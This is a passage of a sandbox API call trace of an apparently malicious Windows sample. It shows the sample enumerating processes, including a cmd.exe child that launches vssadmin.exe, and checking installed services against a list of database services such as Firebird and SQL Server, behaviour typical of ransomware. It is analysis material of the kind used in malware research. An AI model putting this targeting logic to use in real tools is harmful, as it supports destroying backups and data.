	[0046.329] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0046.330] lstrlenW (lpString="implemented.exe") returned 15
	[0046.330] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0046.330] lstrlenW (lpString="comp.exe") returned 8
	[0046.330] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0046.331] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0046.331] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0046.331] lstrlenW (lpString="solved.exe") returned 10
	[0046.331] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0046.332] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0046.332] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0046.332] lstrlenW (lpString="trips.exe") returned 9
	[0046.332] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0046.333] lstrlenW (lpString="tumormanual.exe") returned 15
	[0046.333] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0046.333] lstrlenW (lpString="telecom.exe") returned 11
	[0046.333] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0046.334] lstrlenW (lpString="realistic.exe") returned 13
	[0046.334] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.334] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0046.334] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0046.335] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0046.335] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0046.335] lstrlenW (lpString="cmd.exe") returned 7
	[0046.335] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0046.604] lstrlenW (lpString="conhost.exe") returned 11
	[0046.604] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0046.605] lstrlenW (lpString="vssadmin.exe") returned 12
	[0046.605] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0046.605] lstrlenW (lpString="VSSVC.exe") returned 9
	[0046.605] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.606] lstrlenW (lpString="svchost.exe") returned 11
	[0046.606] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0046.606] CloseHandle (hObject=0x1a0) returned 1
	[0046.606] Sleep (dwMilliseconds=0x1f4) 
	[0047.780] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fc48
	[0047.795] EnumServicesStatusExW (in: hSCManager=0x7e0fc48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0047.817] GetLastError () returned 0xea
	[0047.825] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0047.826] EnumServicesStatusExW (in: hSCManager=0x7e0fc48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0047.827] CloseServiceHandle (hSCObject=0x7e0fc48) returned 1
	[0047.827] lstrlenW (lpString="Appinfo") returned 7
	[0047.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0047.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0047.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0047.827] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0047.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0047.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0047.827] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0047.827] lstrlenW (lpString="AudioSrv") returned 8
	[0047.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0047.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0047.827] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0047.827] lstrlenW (lpString="BFE") returned 3
	[0047.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0047.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0047.827] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0047.827] lstrlenW (lpString="CryptSvc") returned 8
	[0047.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0047.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0047.827] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0047.827] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0047.828] lstrlenW (lpString="CscService") returned 10
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0047.828] lstrlenW (lpString="DcomLaunch") returned 10
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0047.828] lstrlenW (lpString="Dhcp") returned 4
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0047.828] lstrlenW (lpString="Dnscache") returned 8
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0047.828] lstrlenW (lpString="DPS") returned 3
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0047.828] lstrlenW (lpString="eventlog") returned 8
	[0047.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0047.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0047.828] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0047.828] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0047.829] lstrlenW (lpString="EventSystem") returned 11
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0047.829] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0047.829] lstrlenW (lpString="gpsvc") returned 5
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0047.829] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0047.829] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0047.829] lstrlenW (lpString="iphlpsvc") returned 8
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0047.829] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0047.829] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0047.829] lstrlenW (lpString="LanmanServer") returned 12
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0047.829] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0047.829] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0047.829] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0047.829] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0047.829] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0047.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0047.829] lstrlenW (lpString="lmhosts") returned 7
	[0047.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0047.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0047.830] lstrlenW (lpString="MMCSS") returned 5
	[0047.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0047.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0047.830] lstrlenW (lpString="MpsSvc") returned 6
	[0047.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0047.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0047.830] lstrlenW (lpString="Netman") returned 6
	[0047.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0047.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0047.830] lstrlenW (lpString="netprofm") returned 8
	[0047.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0047.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0047.830] lstrlenW (lpString="NlaSvc") returned 6
	[0047.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0047.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0047.830] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0047.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0047.830] lstrlenW (lpString="nsi") returned 3
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0047.831] lstrlenW (lpString="PcaSvc") returned 6
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0047.831] lstrlenW (lpString="PlugPlay") returned 8
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0047.831] lstrlenW (lpString="Power") returned 5
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0047.831] lstrlenW (lpString="ProfSvc") returned 7
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0047.831] lstrlenW (lpString="RpcEptMapper") returned 12
	[0047.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0047.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0047.831] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0047.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0047.832] lstrlenW (lpString="RpcSs") returned 5
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0047.832] lstrlenW (lpString="SamSs") returned 5
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0047.832] lstrlenW (lpString="Schedule") returned 8
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0047.832] lstrlenW (lpString="SENS") returned 4
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0047.832] lstrlenW (lpString="ShellHWDetection") returned 16
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0047.832] lstrlenW (lpString="Spooler") returned 7
	[0047.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0047.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0047.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0047.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0047.833] lstrlenW (lpString="swprv") returned 5
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0047.833] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0047.833] lstrlenW (lpString="SysMain") returned 7
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0047.833] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0047.833] lstrlenW (lpString="Themes") returned 6
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0047.833] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0047.833] lstrlenW (lpString="TrkWks") returned 6
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0047.833] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0047.833] lstrlenW (lpString="UxSms") returned 5
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0047.833] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0047.833] lstrlenW (lpString="VSS") returned 3
	[0047.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0047.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0047.833] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
